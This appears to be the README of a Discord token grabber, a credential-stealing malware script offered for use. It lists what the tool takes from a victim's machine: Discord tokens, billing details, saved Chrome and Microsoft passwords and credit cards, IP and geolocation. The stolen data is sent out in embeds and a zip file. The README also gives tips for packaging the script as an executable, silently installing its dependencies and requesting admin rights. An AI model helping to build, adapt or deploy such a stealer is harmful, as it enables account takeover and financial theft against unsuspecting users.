What about the flafla_in_your_discord_zbi.py file ?
For the set-up check the Setting up section of main README
The different fonctionalities of my discord Token Grabber
- Registered Phone
- Nitro status
- Billing infos
- Discord Tokens
- Computer OS
- Username
- PC Name
- Token Location
- IP addr
- Geolocation (gps coordinates with gg map link)
- City (conceptual location regarding the IP)
- Region
- Country
- Email Status
- 2FA/MFA Status
- Creation date
- Locally stored password
- Microsoft
- Chrome
- Locally Stored CC infos
- Microsoft
- Chrome
- The last part od Stored infos are send in a separate .zip file before the embeds informations
- There is one embed per account registered in the computer through :
- Discord
- Discord Canary
- Discord PTB
- Google Chrome
- Opera
- Brave
- Yandex
- You can add Some Tokens path for other browsers if you know it in the
constantline 63
while respecting the structure
You can easily convert the file in an executable with any converter
If you are using an executable version, you can dodge the requirements installation phase by adding this :
| line 12 |
import dhooks
except ImportError:
os.system("pip install dhooks > nul")
import cryptography
except ImportError:
os.system("pip instll cryptography > nul")
Knowing that you have the possibility with an executable to ask for the admins rights which avoids the problems of privileges (I strongly recommanded auto-py-to-exe it's easy and efficient)